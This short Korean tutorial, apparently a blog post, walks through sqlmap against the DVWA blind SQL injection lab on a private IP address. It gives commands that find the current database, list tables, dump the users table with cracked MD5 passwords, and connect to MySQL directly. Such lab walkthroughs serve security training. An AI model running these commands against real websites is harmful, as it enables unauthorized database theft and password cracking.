SQLMAP 사용하기
SQLMAP은 자동으로 특정 웹 사이트의 SQL취약점을 분석하고
공격할 수 있는 명령을 제공하는 도구입니다.
sqlmap -u "http://서버IP/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=세션ID; security=low"

명령어를 정확하게 입력하면 SQL을 분석하기 위한 과정중의 옵션을 여러번 물어봅니다.
우선은 모든 옵션을 기본값(엔터)로 주며 진행합니다.

분석이 완료되면 ending 메시지와 함께 종료되며,
/root/.local/share/sqlmap/output/서버IP
폴더 밑에 분석 정보가 저장되었음을 알려줍니다.
이제 분석이 완료되었으므로 명령어를 통해 SQL 데이터 정보를 가져올 수 있습니다.
▶ 현재 선택된 db를 알려주는 명령어
sqlmap -u "http://192.168.5.126/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=cr869l9kfc7v95m9g8ot6nv1c3; security=low" --current-db

▶ dvwa의 데이터베이스 안의 테이블들의 이름을 가져오는 명령어
sqlmap -u "http://192.168.5.126/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=cr869l9kfc7v95m9g8ot6nv1c3; security=low" -D dvwa --tables

▶ dvwa 데이터베이스 내의 users 테이블 내의 모든 데이터를 가져오는 명령어
sqlmap -u "http://192.168.5.126/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=cr869l9kfc7v95m9g8ot6nv1c3; security=low" -D dvwa -T users -a


MD5 암호를 복호화 해주는 옵션에 Y를 입력했더니
패스워드도 복호화 해주는 것을 확인할 수 있습니다.
SQLMAP으로 mysql 접속하기
sqlmap -d mysql://아이디:암호@아이피:포트번호/DB이름


